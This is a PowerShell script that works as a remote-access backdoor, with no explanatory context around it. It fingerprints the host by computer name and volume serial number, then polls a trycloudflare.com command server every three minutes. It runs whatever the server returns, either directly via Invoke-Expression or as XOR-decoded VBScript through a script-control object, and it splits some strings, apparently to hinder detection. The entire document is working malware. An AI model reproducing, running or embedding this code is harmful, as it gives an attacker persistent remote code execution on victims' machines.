$select = "select * from win32_";
$select = $select  +"logicaldisk where DeviceID='$env:SystemDrive'";
$selection = Get-WmiObject -Query $($select);
$wc= New-Object net.webclient;
$code=$selection.VolumeSerialNumber;
function getHttp($barkas){
    $url = "https://sister-certification-classical-characterization.trycloudflare.com/post.php";
    $request = $wc.UploadValues($url,$barkas);
    controller $request 'VBScript';
}
function decoder($objectExecute){

     
    $response = [System.Text.Encoding]::UTF8.GetBytes($objectExecute);
    $countLenth = $response.Length;
    [byte[]]$bytes = new-object byte[] $countLenth;
    for($uefi=0; $uefi -lt $response.count ; $uefi++){ 
        $bytes[$uefi] = $response[$uefi] -bxor $code[$uefi % $code.Length ];
    };
    return [System.Text.Encoding]::UTF8.GetString($bytes);
}
function serialNumber(){
    $selection = Get-WmiObject -Query $select;
    $number = ($selection).VolumeSerialNumber;
    $name = ";"+ [System.Convert]::ToUInt32($number,16);
    return $name;
}
function controller($request,$coll){

    [string]$responses = [System.Text.Encoding]::UTF8.GetString($request);
    if($responses.Length -gt 0){
    $a= "!";
        if($responses[0] -eq  $a){
            $responses.SubString(1) | iex;
        }else{
            $vbsCode = decoder $responses;

        start-job {
            $a=$args[1];
            $time = 54000000;
            $sc = New-Object -ComObject MSScriptControl.ScriptControl.1;
            $sc.Language =  $a;
            $sc.Timeout = $time ; 
            $sc.AddCode($args[0]);
        } -ArgumentList $vbsCode,$coll -runas32;
        }
    }
}


while($true){
    $PSname = $env:computername+ $(serialNumber)
    $goal = New-Object System.Collections.Specialized.NameValueCollection;
    $name =  "i";
    $names =  $name + "lo"+"g"+"in";
    $goal.Add($names, $PSname);
    getHttp $goal;
    
Start-Sleep -s 180;
}